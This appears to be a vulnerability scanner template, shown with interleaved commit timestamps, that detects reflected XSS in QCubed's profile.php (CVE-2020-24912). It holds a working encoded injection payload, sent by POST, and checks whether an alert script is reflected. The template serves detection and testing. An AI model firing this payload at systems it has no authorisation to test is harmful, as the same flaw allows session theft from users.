2021-09-15 06:00:51 +00:00
id : CVE-2020-24912
info :
name : QCube Cross-Site-Scripting
author : pikpikcu
severity : medium
2021-09-15 11:50:24 +00:00
description : A reflected cross-site scripting (XSS) vulnerability in qcubed (all versions including 3.1.1) in profile.php via the stQuery-parameter allows unauthenticated attackers to steal sessions of authenticated users.
2021-09-15 06:00:51 +00:00
reference :
- https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03
- https://nvd.nist.gov/vuln/detail/CVE-2020-24912
2021-09-15 11:19:18 +00:00
- http://seclists.org/fulldisclosure/2021/Mar/30
2021-09-21 10:13:08 +00:00
tags : cve,cve2020,qcubed,xss
2021-09-15 11:53:20 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.10
cve-id : CVE-2020-24912
cwe-id : CWE-79
2021-09-15 06:00:51 +00:00
requests :
- method : POST
path :
- "{{BaseURL}}/assets/_core/php/profile.php"
- "{{BaseURL}}/assets/php/profile.php"
- "{{BaseURL}}/vendor/qcubed/qcubed/assets/php/profile.php"
headers :
Content-Type : application/x-www-form-urlencoded
body : "intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K="
matchers-condition : and
matchers :
- type : word
words :
2021-09-15 11:50:24 +00:00
- "<script>alert('xss')</script>"
2021-09-15 06:00:51 +00:00
part : body
- type : word
words :
- 'Content-Type : text/html'
part : header